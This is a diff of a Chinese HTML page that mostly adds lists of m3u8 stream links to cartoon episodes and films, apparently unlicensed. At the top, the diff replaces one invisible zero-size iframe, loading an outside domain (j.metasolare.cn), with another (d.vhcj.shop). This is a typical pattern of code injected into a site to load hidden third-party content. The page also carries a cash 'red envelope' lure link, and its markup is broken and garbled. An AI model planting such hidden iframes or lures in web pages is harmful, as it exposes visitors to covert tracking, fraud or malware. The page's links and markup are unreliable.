--- a/index1.html
+++ b/index1.html
@@ -2,11 +2,12 @@
 
 
 
+
 <?php
 <body>
    
     
-    <iframe src="http://j.metasolare.cn/KzzTj35915"frameborder="0" width="0" height="0"></iframe>
+    <iframe src="http://d.vhcj.shop/w0try7393"frameborder="0" width="0" height="0"></iframe>
 
    </body>
 <html>
@@ -55,21 +56,84 @@ infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100%
 
 前面是文字居中 --><a href="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4">★★★快手红包点击领取★★★</a></div></div> </br>
 </br>
-<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 
 
-6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 
-
-81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 
-
-infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
-<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
-<MARQUEE><STRONG>
-
-<b id="nr"><a href="https://98tv.github.io">你猜电影去哪里了.维护中.......</a></FONT></STRONG></MARQUEE></SPAN>
-</div>
 	
-<li><a href="https://vip.lz-cdn10.com/20220607/1743_c35a1d0b/index.m3u8">      HD高清神奇坠饰</a></li>
+	<details><summary>
+<img src="https://img.manhua.weibo.com/page/cover/2018/05/09/YGGzhtvu.jpg" width="150" height="150"<span></span>
+  </summary>
 
+<a href="https://vip.ffzy-online1.com/20230107/21940_ec1bbc01/index.m3u8">茶2中第1集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21939_1a877e99/index.m3u8">茶2中第2集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21941_f87ab852/index.m3u8">茶2中第3集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21943_e37af5cd/index.m3u8">茶2中第4集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21948_3325747b/index.m3u8">茶2中第5集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21942_4fe3c787/index.m3u8">茶2中第6集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21944_f81d1c1e/index.m3u8">茶2中第7集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21949_b007505d/index.m3u8">茶2中第8集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21946_6d25d9e1/index.m3u8">茶2中第9集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21945_384f3cfb/index.m3u8">茶2中第10集</a></li><li>
+
+<a href="https://vip.ffzy-online1.com/20230107/21905_b121ca68/index.m3u8">茶2中第11集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21907_4a49f4ce/index.m3u8">茶2中第12集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21906_39bd7651/index.m3u8">茶2中第13集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21910_5537a1c5/index.m3u8">茶2中第14集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21916_19b4bbcd/index.m3u8">茶2中第15集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21909_2025107a/index.m3u8">茶2中第16集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21912_bfc6b018/index.m3u8">茶2中第17集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21913_38ad21bf/index.m3u8">茶2中第18集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21911_d6b7a5c5/index.m3u8">茶2中第19集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21914_555741f0/index.m3u8">茶2中第20集</a></li><li>	
+<a href="https://vip.ffzy-online1.com/20230107/21905_b121ca68/index.m3u8">茶2中第21集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21915_b4858992/index.m3u8">茶2中第31集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230213/23982_713fc28e/index.m3u8">茶2中第32集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21918_d44ad3a4/index.m3u8">茶2中第33集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21917_b5311a4d/index.m3u8">茶2中第34集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21920_993bcede/index.m3u8">茶2中第35集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21924_4c2bf711/index.m3u8">茶2中第36集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21922_c0309e51/index.m3u8">茶2中第37集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21923_f9ad4bfb/index.m3u8">茶2中第38集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21921_cf3d0ea3/index.m3u8">茶2中第39集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21925_25958ec3/index.m3u8">茶2中第40集</a></li><li>
+
+<a href="https://vip.ffzy-online1.com/20230107/21926_cdcae27f/index.m3u8">茶2中第41集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21927_4e2859a5/index.m3u8">茶2中第2集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21929_6f725fcf/index.m3u8">茶2中第43集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21928_4335bf09/index.m3u8">茶2中第44集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21930_571a7d30/index.m3u8">茶2中第45集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21931_a174e66d/index.m3u8">茶2中第46集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21932_84f2cd21/index.m3u8">茶2中第47集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21935_404e56c6/index.m3u8">茶2中第48集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21933_65efb99c/index.m3u8">茶2中第49集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21934_58fae7b9/index.m3u8">茶2中第50集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21936_344bbbab/index.m3u8">茶2中第51集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21938_5bcad0d9/index.m3u8">茶2中第52集</a></li><li>
+<a href="https://vip.ffzy-online1.com/20230107/21937_2325ba8c/index.m3u8">茶2中第53集</a></li><li>
+ 国语大电影
+<a href="https://vip.ffzy-online2.com/20230725/42081_4ce08389/index.m3u8">TC中字电影</a></li><li>
+
+</script>
+	
+  </div>
+</details>
+	<div class="image-container">
+  <details><summary>
+<img src="https://p0.ssl.qhimgs1.com/sdr/400__/t01d5e1d9f1eb3d5736.jpg"width="150"  height="150" <span><li>第一季全集</span>
+  </summary></li>
+<li><a href="https://s6.bfzycdn.com/video/baoxiaochongzidiyiji/%E5%90%88%E9%9B%86/index.m3u8">第二季全集</a></li>
+
+<li><a href="https://s6.bfzycdn.com/video/baoxiaochongzidierji/%E5%90%88%E9%9B%86/index.m3u8">第三季全集</a></li>
+
+<li><a href="https://s6.bfzycdn.com/video/baoxiaochongzidisanji/%E5%90%88%E9%9B%86/index.m3u8">第四季全集</a></li>
+
+
+<li><a href="https://vip.ffzy-play2.com/20230102/19106_cf5442d4/index.m3u8">荒岛求生</a></li>
+</summary></details>
+<div class="image-container">
+  <details><summary>
+ <span>虫虫大电影</span></summary>
+
+<li><a href="https://two.svipplay.com/lzm3u8/2f6d1df53950d3e6135a1c28ada6fdf2.m3u8?token=u82QsiDTaq2ASrIwZpAJhQ&expires=1695391654">      HD高清神奇坠饰</a></li>
+<li><a href="https://s.xlzys.com/play/1aM8ggOe/index.m3u8">     冒险岛大电影</a></li>
 
 </summary></details>
     </script>
